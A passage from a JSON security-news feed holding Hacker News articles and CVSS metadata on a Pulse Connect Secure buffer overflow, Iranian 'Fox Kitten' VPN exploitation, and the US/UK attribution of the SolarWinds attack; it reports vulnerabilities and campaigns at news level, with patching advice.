"CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T17:42:28", "id": "THN:AE2E46F59043F97BE70DB77C163186E6", "href": "https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-BCVwauxz7O8/YKyosjaDKmI/AAAAAAAACn4/TLH1Bsw4NgwXyHFB5EmU57Aro4WWNwQegCLcBGAsYHQ/s0/pulse-secure-vpn-vulnerability.jpg>)\n\nIvanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may allow an authenticated remote attacker to execute arbitrary code with elevated privileges.\n\n\"Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\" the company [said](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) in an alert published on May 14. \"As of version 9.1R3, this permission is not enabled by default.\"\n\nThe flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.\n\n\"When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\" CERT/CC [detailed](<https://kb.cert.org/vuls/id/667933>) in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.'\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability.\n\nIt bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named '[Workaround-2104.xml,](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY>)' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.'\n\n[](<https://thehackernews.com/images/-2uTEZxdSTZw/YKypBTo6Q-I/AAAAAAAACoE/B0oJ9iYqOKkxyiyr2rn0S1KzYo5qu3QvgCLcBGAsYHQ/s0/pulse.jpg>)\n\nWhile Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. \n\n\"The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,\" it noted.\n\n\"An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy.\"\n\nThe disclosure of a new flaw arrives weeks after the Utah-based IT software company [patched](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>) multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively [exploited in the wild](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) by at least two different threat actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-25T07:37:00", "type": "thn", "title": "New High-Severity Vulnerability Reported in Pulse Connect Secure VPN", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22908"], "modified": "2021-05-25T07:37:19", "id": "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "href": "https://thehackernews.com/2021/05/new-high-severity-vulnerability.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe ad